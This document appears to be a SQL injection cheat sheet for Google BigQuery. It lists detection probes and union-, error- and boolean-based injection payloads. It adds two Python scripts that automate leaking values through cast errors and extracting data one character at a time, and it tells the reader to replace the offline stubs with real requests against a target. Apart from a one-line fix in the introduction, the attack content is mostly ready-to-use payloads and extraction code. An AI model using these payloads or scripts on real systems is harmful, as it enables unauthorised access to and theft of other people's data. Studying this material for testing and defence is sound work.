Google BigQuery SQL Injection

Google BigQuery SQL injection is a vulnerability in which an attacker executes arbitrary SQL against a Google BigQuery project by manipulating user input that the application concatenates into a query without sanitisation or parameterisation. The result is unauthorised data access, data manipulation or further abuse of the project the query runs in. The fix on the application side is to pass user-controlled values as query parameters rather than building the query text from them.
Summary

- Detection
- BigQuery Union Based
- BigQuery Error Based
- BigQuery Boolean Based
- BigQuery Time Based
探测 (Detection)
- Trigger an error with the classic single quote:
'
- Identify BigQuery from its table references: a backtick-quoted, three-part project.dataset.table name in the error message or query is characteristic of BigQuery:
SELECT .... FROM `` AS ...
| SQL Query | Description |
| --- | --- |
| `SELECT @@project_id` | Returns the ID of the project the query is executing in |
| `SELECT schema_name FROM INFORMATION_SCHEMA.SCHEMATA` | Lists the datasets (schemas) visible to the job |
| `select * from project_id.dataset_name.table_name` | Reads a table addressed by project ID, dataset and table name |
BigQuery Comment

| Comment type | Description |
| --- | --- |
| `#` | Hash comment, runs to the end of the line |
| `--` | Dash comment, runs to the end of the line |
| `/* PostgreSQL Comment */` | C-style block comment |
BigQuery Union Based

The payloads below were built for a target where the injection point sits inside a subquery that the original statement aliases and groups: `)) AS T1 GROUP BY column_name#` closes the open parentheses, satisfies the outer GROUP BY and comments out the rest of the statement, while the run of `1` values pads the column count to match the original SELECT. Adjust the closing parentheses, the padding and the GROUP BY column to the query you are injecting into. BigQuery checks the types of UNION ALL columns strictly, so a padding `1` under a STRING column fails with an incompatible-types error; use a string literal in that position instead.

UNION ALL SELECT (SELECT @@project_id),1,1,1,1,1,1)) AS T1 GROUP BY column_name#
true) GROUP BY column_name LIMIT 1 UNION ALL SELECT (SELECT 'asd'),1,1,1,1,1,1)) AS T1 GROUP BY column_name#
true) GROUP BY column_name LIMIT 1 UNION ALL SELECT (SELECT @@project_id),1,1,1,1,1,1)) AS T1 GROUP BY column_name#
' GROUP BY column_name UNION ALL SELECT column_name,1,1 FROM (select column_name AS new_name from `project_id.dataset_name.table_name`) AS A GROUP BY column_name#
BigQuery Error Based

| SQL Query | Description |
| --- | --- |
| `' OR if(1/(length((select('a')))-1)=1,true,false) OR '` | Division by zero: `length('a')-1` is 0, so the division raises an error. Replacing the constant with an expression that is 0 only when a condition holds turns this into an error/no-error oracle |
| `select CAST(@@project_id AS INT64)` | Casting: the project ID is not numeric, so the CAST fails and BigQuery echoes the offending value in the error message, leaking it in one query |
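The two rows above generalise to a small toolkit: a cast payload that always fails (even when the leaked value happens to be numeric) and a parser for the resulting error, plus the division-by-zero probe rewritten as a true/false oracle. This is an added example, not code from the original page. It assumes the application relays BigQuery's error text to the client and that a failed integer cast reports it as "Bad int64 value: <value>"; the HTTP transport is left out and replaced by a constructed stand-in so the script runs offline.

```python
"""Error-based extraction helpers for BigQuery (added example).

Assumptions: the target echoes BigQuery error text, and CAST(<non-numeric>
AS INT64) fails with "Bad int64 value: <value>". Network transport is not
included; fake_target() stands in for the vulnerable application."""
import re
from typing import Optional

# Prefix forced in front of the leaked value so the CAST fails even when the
# value is numeric (assumption: any non-digit prefix makes the cast fail).
SENTINEL = "x:"
BAD_INT64 = re.compile(r"Bad int64 value: " + re.escape(SENTINEL) + r"(.*)")


def cast_leak_payload(scalar_subquery: str) -> str:
    """Injected value for a quoted-string context: the scalar subquery's
    result is prefixed with SENTINEL and cast to INT64, which always fails
    and places the value in the error message."""
    return f"' OR CAST(CONCAT('{SENTINEL}', ({scalar_subquery})) AS INT64) = 1 OR '"


def conditional_error_payload(condition_sql: str) -> str:
    """Generalisation of the 1/(length(...)-1) probe from the table: the
    divisor is 0 only when condition_sql is TRUE, so an error answers TRUE
    and a normal response answers FALSE (BigQuery's '/' raises on zero)."""
    return f"' OR 1/(IF(({condition_sql}), 0, 1)) = 1 OR '"


def parse_leaked_value(error_text: str) -> Optional[str]:
    """Return the value leaked by a cast failure, or None when the response
    is some other error or not an error at all."""
    m = BAD_INT64.search(error_text)
    return m.group(1).strip() if m else None


def fake_target(payload: str, stored_value: str) -> str:
    """Constructed stand-in for the vulnerable application: answers a
    cast-leak payload the way BigQuery would for the row it would read."""
    if "CAST(CONCAT(" in payload:
        return f"400 Bad int64 value: {SENTINEL}{stored_value}"
    return "200 OK"


if __name__ == "__main__":
    # Constructed sample: the project ID the injected subquery would return.
    response = fake_target(cast_leak_payload("SELECT @@project_id"), "my-project-1234")
    print(parse_leaked_value(response))  # my-project-1234
```

Against a real target, replace `fake_target` with the request that submits the payload and returns the response body; `parse_leaked_value` then reads the value straight out of the error, one row per request.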
BigQuery Boolean Based

The predicate compares one character of the first row returned by the subquery, so each request answers a single yes/no question through the application's "true" or "false" response. Walk positions 1, 2, 3, ... and the candidate characters until no candidate matches. SUBSTRING is 1-indexed and BigQuery string comparison is case-sensitive, so upper- and lower-case letters must be probed separately.

' WHERE SUBSTRING((select column_name from `project_id.dataset_name.table_name` limit 1),1,1)='A'#
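Automating the oracle above is the usual next step; the script below recovers the first row of the subquery one character at a time. It is an added example, not code from the original page. The request to the target is replaced by a local stub that parses the injected predicate and evaluates it against a constructed secret, so it runs offline; the project, dataset and table names are the placeholders from the payload, and a real run swaps `make_stub_oracle` for a function that sends the payload and returns True when the "true" page comes back.

```python
"""Boolean-based extraction through the SUBSTRING oracle (added example).

make_stub_oracle() is a constructed stand-in for the vulnerable application;
replace it with real transport to use against a target."""
import re
import string
from typing import Callable

# Hypothetical target names, as in the payload on the page.
TARGET_SUBQUERY = "select column_name from `project_id.dataset_name.table_name` limit 1"
# Candidate alphabet; extend it if extraction stops early on unusual data.
CHARSET = string.ascii_letters + string.digits + "_-.@"


def build_payload(subquery: str, position: int, candidate: str) -> str:
    """Injected suffix in the shape used on the page. BigQuery's SUBSTRING is
    1-indexed and string comparison is case-sensitive, so 'a' and 'A' are
    distinct probes."""
    if candidate in "'\\":
        raise ValueError("quote and backslash need escaping before use")
    return f"' WHERE SUBSTRING(({subquery}),{position},1)='{candidate}'#"


def extract(oracle: Callable[[str], bool], subquery: str, max_len: int = 64) -> str:
    """Linear probe: one request per candidate per position. Stops at the
    first position where no candidate matches, which is the end of the
    value (or a character outside CHARSET)."""
    recovered = ""
    for position in range(1, max_len + 1):
        for candidate in CHARSET:
            if oracle(build_payload(subquery, position, candidate)):
                recovered += candidate
                break
        else:
            break
    return recovered


_PREDICATE = re.compile(r"SUBSTRING\(\((.*)\),(\d+),1\)='(.)'#$")


def make_stub_oracle(secret: str) -> Callable[[str], bool]:
    """Constructed stand-in for the vulnerable application: parses the
    injected predicate and evaluates it the way BigQuery would against the
    single row `secret`. Positions past the end compare against '' and fail."""
    def oracle(payload: str) -> bool:
        m = _PREDICATE.search(payload)
        if not m:
            raise ValueError(f"unexpected payload: {payload}")
        position, candidate = int(m.group(2)), m.group(3)
        return position <= len(secret) and secret[position - 1] == candidate
    return oracle


if __name__ == "__main__":
    # Constructed sample value standing in for the first row of the table.
    oracle = make_stub_oracle("svc_account-01")
    print(extract(oracle, TARGET_SUBQUERY))  # svc_account-01
```

The linear probe costs up to `len(CHARSET)` requests per character; when request budget matters, the same oracle works with a range comparison on the character code to binary-search each position instead.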
BigQuery Time Based

BigQuery exposes no SLEEP- or BENCHMARK-style delay function, so the classic time-based technique has no direct equivalent; rely on the error-based and boolean-based oracles above instead.